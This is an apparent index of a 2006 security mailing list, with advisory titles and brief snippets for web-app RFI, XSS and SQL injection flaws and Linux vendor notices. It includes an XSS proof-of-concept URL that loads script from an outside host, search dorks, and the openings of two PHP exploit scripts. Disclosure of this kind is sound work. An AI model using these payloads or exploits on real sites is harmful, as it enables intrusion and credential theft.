[ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities

ECHO_ADV_38$2006 --- [ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities

Photocycle v1.0 - XSS

Photocycle v1.0 Homepage http://adambrown.info/p/tools/photocycle XSS vuln on phpage var: PoC http://www.example.com/photocyclephpage=script%20src=http://www.youfucktard.com/xss.js/script

ScozNews Final-Php =1.1 Remote File Inclusion Vulnerability

ScozNews Final-Php =1.1 Remote File Inclusion Vulnerability -- Discoverd By: XORON -- [EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com -- script site: www.scoznet.com

Orbitmatrix PHP Script v1.0

Orbitmatrix PHP Script v1.0 Homepage: http://www.orbitcoders.com/ Affected files: index.php Possible SQL injection?: http://www.example.com/index.php?page_name=' And by trying a XSS vuln as shown below on page_name we see the query below which is displayed on screen:

Flipper Poll = 1.1.0 Remote File Inclusion Vulnerability

Flipper Poll = 1.1.0 Remote File Inclusion Vulnerability -- Discoverd By: XORON -- [EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com -- Exploit:

[USN-317-1] zope2.8 vulnerability

=== Ubuntu Security Notice USN-317-1 July 13, 2006 zope2.8 vulnerability CVE-2006-3458 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 This

[USN-318-1] libtunepimp vulnerability

=== Ubuntu Security Notice USN-318-1 July 13, 2006 libtunepimp vulnerability http://bugs.musicbrainz.org/ticket/1764 === A security issue affects the following Ubuntu

[ MDKSA-2006:122 ] - Updated php packages fix multiple vulnerabilities

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:122 http://www.mandriva.com/security/

flatnuke = 2.5.7 arbitrary php file upload

12/07/200619.11.54 - Flatnuke 2.5.7 arbitrary file upload / remote code execution - software: site: http://www.flatnuke.org/ if user Gallery uploads are enabled (not the default) you can go to:

PHORUM 5 arbitrary local inclusion

#!/usr/bin/php -q -d short_open_tag=on ? echo PHORUM 5 arbitrary local inclusion exploit\n; echo by rgod [EMAIL PROTECTED]; echo site: http://retrogod.altervista.org\n;; echo dork: \This forum powered by Phorum.\\n\n; /* works with: register_globals=On magic_quotes_gpc=Off */ if

phpbb 3.x sql injection (with global moderator rights)

#!/usr/bin/php -q -d short_open_tag=on ? echo PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n; echo by rgod [EMAIL PROTECTED]; echo site: http://retrogod.altervista.org\n;; echo dork, version specific: \Powered by phpBB * 2002, 2006 phpBB Group\\n\n; /*

Re: [ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities

Hello, El jue, 13-07-2006 a las 01:35 +, [EMAIL PROTECTED] escribió: require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' ); Variables $mosConfig_absolute_path are not properly sanitized.

[ MDKSA-2006:123 ] - Updated kernel packages fixes multiple vulnerabilities

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:123 http://www.mandriva.com/security/

perForms = 1.0 ([mosConfig_absolute_path]) Remote File Inclusion

--- perForms = 1.0 ([mosConfig_absolute_path]) Remote File Inclusion --- Remote : Yes Critical Level : High Vuln founded in a log file: lazy

rPSA-2006-0122-2 kernel

rPath Security Advisory: 2006-0122-2 Published: 2006-07-07 Updated: 2006-07-13 Upgraded to Critical status with additional information Products: rPath Linux 1 Rating: Critical Exposure Level Classification: Local Root Deterministic Privilege Escalation Updated Versions: kernel=/[EMAIL